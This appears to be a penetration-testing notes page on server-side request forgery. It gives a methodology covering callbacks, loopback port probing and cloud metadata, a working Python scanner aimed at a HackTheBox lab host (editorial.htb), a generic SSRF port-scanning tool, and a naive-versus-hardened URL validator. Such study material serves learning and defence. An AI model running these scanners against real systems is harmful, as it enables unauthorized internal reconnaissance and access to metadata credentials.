P4n1cBook

SSRF

Server Side Request Forgery: abusing a parameter that makes the server fetch a URL so that the request goes to a destination of the attacker's choosing, typically one that is only reachable from the server itself (loopback services, internal hosts, cloud metadata).

Methodology

  1. Watch for unexpected redirects, especially to internal or private IP addresses (127/8, 10/8, 172.16/12, 192.168/16, 169.254/16). A parameter that makes the server follow such a redirect is a likely SSRF endpoint.

  2. Point the suspect parameter at a listener you control (for example nc -lvnp on a host you own, or a Burp Collaborator payload) and check whether the server connects back. An inbound connection confirms that the server issues requests on your behalf, and its source IP and User-Agent tell you which component is doing the fetching.

  3. Probe http://127.0.0.1:PORT through the parameter and note which ports answer differently from a closed one (different status, body or latency). Those are internal services that the server can reach but you cannot.

  4. Query each open port through the vulnerable parameter. The responses may leak banners, headers, internal error pages or instance metadata (on cloud hosts, 169.254.169.254) that were never meant to leave the host.

  5. If the SSRF exposes internal endpoints, such as a private API, enumerate and query those endpoints through the same parameter.
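To make the failure behind steps 1 and 4 concrete, here is a naive URL check of the kind that leaves a fetcher exploitable, beside a hardened one. This is an added example, not code from P4n1cBook or from any target it covers; the hostname table is constructed so the code runs offline, and resolve() stands in for socket.getaddrinfo().

```python
#!/usr/bin/python3
"""Added example (not from the P4n1cBook page): a naive SSRF check beside a
hardened one. Hostnames are resolved through a constructed table so the code
runs offline; swap resolve() for socket.getaddrinfo() in a real fetcher."""
import ipaddress
from urllib.parse import urlsplit

# Constructed DNS view (assumption): what the vulnerable server would resolve.
FAKE_DNS = {
    "cdn.example.com": ["93.184.216.34"],                      # ordinary public host
    "books.internal": ["10.0.0.5"],                            # internal name
    "rebind.attacker.test": ["93.184.216.34", "127.0.0.1"],    # one public, one loopback record
    "metadata.attacker.test": ["169.254.169.254"],             # points at cloud metadata
}


def resolve(host):
    """Stand-in for socket.getaddrinfo(): every A/AAAA record for the name."""
    return FAKE_DNS.get(host, [])


def vulnerable_target(url):
    """The kind of check that leaves an endpoint exploitable: it only blocks
    the literal string 127.0.0.1, so localhost, [::1], 0.0.0.0, internal
    hostnames and the metadata address all go through."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    return parts.hostname != "127.0.0.1"


def hardened_target(url):
    """Allow only http(s) on a default port, no credentials in the URL, and
    require every address the hostname resolves to be globally routable.
    The caller must also refuse to follow redirects, or re-run this check
    on every hop, otherwise a public host can 302 the server to 127.0.0.1."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host or parts.username is not None or parts.password is not None:
        return False                # user:pass@host tricks
    try:
        port = parts.port           # raises ValueError on a malformed port
    except ValueError:
        return False
    if port not in (None, 80, 443):
        return False                # no port scanning through the fetcher
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IPv4/IPv6
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        return False                # unresolvable: fail closed
    # is_global is False for loopback, RFC 1918, link-local (169.254/16, so
    # the metadata address), 0.0.0.0/8, ::1, fc00::/7 and similar ranges.
    return all(ipaddress.ip_address(a).is_global for a in addrs)
```

Checking every resolved address, rather than only the first, is what closes the rebinding case: a name that returns one public and one loopback record is rejected outright instead of being decided by which record the resolver happens to return to the fetch.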


Port Scanner

  • Use this script to enumerate open ports on the target's loopback interface through the vulnerable parameter:

#!/usr/bin/python3
import io
import requests

URL = "http://editorial.htb/upload-cover"   # Vulnerable URL
TIMEOUT = 5                                 # Seconds to wait for the server's fetch

for port in range(1, 65536):                # 1..65535 inclusive
    # The form requires a file field, so send an empty in-memory file. A fresh
    # object per request keeps the stream open and at offset 0 when requests reads it.
    data_file = {"bookfile": ("a", io.BytesIO(b""))}      # Mandatory parameter
    data_post = {"bookurl": f"http://127.0.0.1:{port}"}   # Vulnerable parameter
    try:
        r = requests.post(URL, files=data_file, data=data_post, timeout=TIMEOUT)
    except requests.RequestException as e:
        print(f"Error on port {port}: {e}")
        continue
    # A closed port makes the server fall back to its default cover image (a path
    # ending in .jpeg); any other body means something answered on that port.
    if not r.text.strip().endswith('.jpeg'):
        print(f"{port} --- {r.text}")
  • Modify the parameters for your use case.
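The '.jpeg' filter above only works on that one target. The general form of the technique is to take a baseline from ports you know are closed and report any port whose status, body length or latency departs from it. The following is an added example, not P4n1cBook's code: the probe function is injected, so the scan runs here against a constructed responder, and make_http_probe() shows the shape of a real probe under the assumption that the target takes the URL in a POST field.

```python
#!/usr/bin/python3
"""Added example (not from the P4n1cBook page): internal port discovery by
response differential. Baseline closed ports, then flag whatever differs.
The probe is injected so the scan runs offline against a constructed
responder; make_http_probe() is an assumption about the target's form."""
import statistics
import time


def baseline(probe, closed_ports):
    """Status, body length and median latency of ports known to be closed."""
    samples = [probe(p) for p in closed_ports]
    return {
        "status": samples[0][0],
        "length": len(samples[0][1]),
        "time": statistics.median(t for _, _, t in samples),
    }


def classify(sample, base, slack=2.0):
    """Name the way a probe result differs from the closed-port baseline."""
    status, body, elapsed = sample
    if status is None:
        return "filtered (no reply before timeout)"
    if status != base["status"]:
        return f"open (HTTP {status} instead of {base['status']})"
    if len(body) != base["length"]:
        return f"open (body {len(body)} bytes, baseline {base['length']})"
    if elapsed > base["time"] + slack:
        return f"slow ({elapsed:.1f}s, baseline {base['time']:.2f}s)"
    return "closed"


def scan(probe, ports, closed_ports=(1, 2, 3)):
    """Return {port: verdict} for every port that does not look closed."""
    base = baseline(probe, closed_ports)
    hits = {}
    for port in ports:
        verdict = classify(probe(port), base)
        if verdict != "closed":
            hits[port] = verdict
    return hits


def make_http_probe(url, param, timeout=5, extra_data=None, files_factory=None):
    """Real probe (assumed layout): POST http://127.0.0.1:PORT in `param`,
    plus any mandatory fields (files_factory() must return a fresh dict per
    request so file streams are not reused). Returns (status, body, seconds);
    status is None when the server's own fetch exceeds the timeout."""
    import requests  # lazy import so the offline demo needs nothing extra

    def probe(port):
        data = dict(extra_data or {})
        data[param] = f"http://127.0.0.1:{port}"
        files = files_factory() if files_factory else None
        start = time.monotonic()
        try:
            r = requests.post(url, data=data, files=files, timeout=timeout)
            return r.status_code, r.text, time.monotonic() - start
        except requests.Timeout:
            return None, "", time.monotonic() - start
    return probe


# Constructed responder standing in for a vulnerable upload endpoint: closed
# ports produce the default-cover fallback, open ports return their own body,
# and one port is silently dropped by a host firewall (the fetch times out).
FAKE_SERVICES = {
    80:   (200, "<html><title>It works!</title></html>", 0.05),
    5000: (200, '{"message":"unsupported media type"}', 0.04),
    8443: (None, "", 5.0),
}


def fake_probe(port):
    return FAKE_SERVICES.get(port, (200, "/static/images/default-cover.jpeg", 0.02))


if __name__ == "__main__":
    for port, verdict in sorted(scan(fake_probe, range(1, 10001)).items()):
        print(f"{port:>5}  {verdict}")
```

Pick the baseline ports from a range you have already confirmed is closed on that host, and keep the timing slack above the server's normal jitter; a port that only shows up as "slow" is usually firewalled rather than open, but it still tells you where a service lives.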


Last updated 4 months ago